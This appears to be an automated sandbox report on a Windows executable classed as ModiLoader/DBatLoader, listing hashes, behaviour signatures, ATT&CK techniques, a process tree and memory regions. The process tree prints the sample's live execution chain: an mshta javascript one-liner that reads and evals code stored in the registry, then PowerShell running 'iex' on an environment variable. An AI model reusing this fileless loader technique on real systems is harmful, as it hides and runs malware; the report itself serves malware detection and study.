Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-05-2024 21:19

General

  • Target

    3c9da07c9117da739c0fd8da19fd339a_JaffaCakes118.exe

  • Size

    297KB

  • MD5

    3c9da07c9117da739c0fd8da19fd339a

  • SHA1

    5c2ac882ee5289c8ec6e64485b02b38544df5eaf

  • SHA256

    d519ff1a5c46a634a9f1d57a814e48d537fe11aa09ce5f0013125e686db96c06

  • SHA512

    54d2c664744b5772c446f37a3025c8a58aa5ce731c3442843b3210c6e29ccafd8381040a4a1f9319da1f49e7a7c78b4e303041735acb497d39043cf660f0e7fe

  • SSDEEP

    6144:xTx9Z4h3oSNcDW1m7Y3qPr5Qh0auUMnbBD9KG:TIr+aiVJagBD3

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3c9da07c9117da739c0fd8da19fd339a_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\3c9da07c9117da739c0fd8da19fd339a_JaffaCakes118.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:2684
    • C:\Users\Admin\AppData\Local\Temp\3c9da07c9117da739c0fd8da19fd339a_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\3c9da07c9117da739c0fd8da19fd339a_JaffaCakes118.exe"
      2⤵
        PID:2240
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:k4x3hTr="sgWyx1l";D48N=new%20ActiveXObject("WScript.Shell");c7sB6zAfV="Yz1tuOT5";Cf4D4N=D48N.RegRead("HKLM\\software\\Wow6432Node\\nx5ce8x\\EC560v4Z");In2WN="V2x1";eval(Cf4D4N);yRF84DHp="IWBCds4";
      1⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3692
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:osxfosfw
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4268

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yvi3najc.blq.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2240-6-0x0000000000B20000-0x0000000000BF6000-memory.dmp
      Filesize

      856KB

    • memory/2240-11-0x0000000000B20000-0x0000000000BF6000-memory.dmp
      Filesize

      856KB

    • memory/2240-5-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/2240-9-0x0000000000B20000-0x0000000000BF6000-memory.dmp
      Filesize

      856KB

    • memory/2240-10-0x0000000000B20000-0x0000000000BF6000-memory.dmp
      Filesize

      856KB

    • memory/2240-8-0x0000000000B20000-0x0000000000BF6000-memory.dmp
      Filesize

      856KB

    • memory/2240-12-0x0000000000B20000-0x0000000000BF6000-memory.dmp
      Filesize

      856KB

    • memory/2240-2-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/2240-3-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

    • memory/2240-7-0x0000000000B20000-0x0000000000BF6000-memory.dmp
      Filesize

      856KB

    • memory/2684-4-0x00000000001F0000-0x00000000001F4000-memory.dmp
      Filesize

      16KB

    • memory/2684-1-0x0000000000400000-0x0000000000453000-memory.dmp
      Filesize

      332KB

    • memory/2684-0-0x00000000001F0000-0x00000000001F4000-memory.dmp
      Filesize

      16KB

    • memory/4268-32-0x00000000069C0000-0x00000000069DA000-memory.dmp
      Filesize

      104KB

    • memory/4268-16-0x00000000056F0000-0x0000000005712000-memory.dmp
      Filesize

      136KB

    • memory/4268-17-0x0000000005F20000-0x0000000005F86000-memory.dmp
      Filesize

      408KB

    • memory/4268-18-0x0000000005F90000-0x0000000005FF6000-memory.dmp
      Filesize

      408KB

    • memory/4268-15-0x0000000005880000-0x0000000005EA8000-memory.dmp
      Filesize

      6.2MB

    • memory/4268-28-0x0000000006000000-0x0000000006354000-memory.dmp
      Filesize

      3.3MB

    • memory/4268-29-0x00000000064A0000-0x00000000064BE000-memory.dmp
      Filesize

      120KB

    • memory/4268-30-0x00000000064F0000-0x000000000653C000-memory.dmp
      Filesize

      304KB

    • memory/4268-31-0x0000000007D00000-0x000000000837A000-memory.dmp
      Filesize

      6.5MB

    • memory/4268-14-0x0000000002D80000-0x0000000002DB6000-memory.dmp
      Filesize

      216KB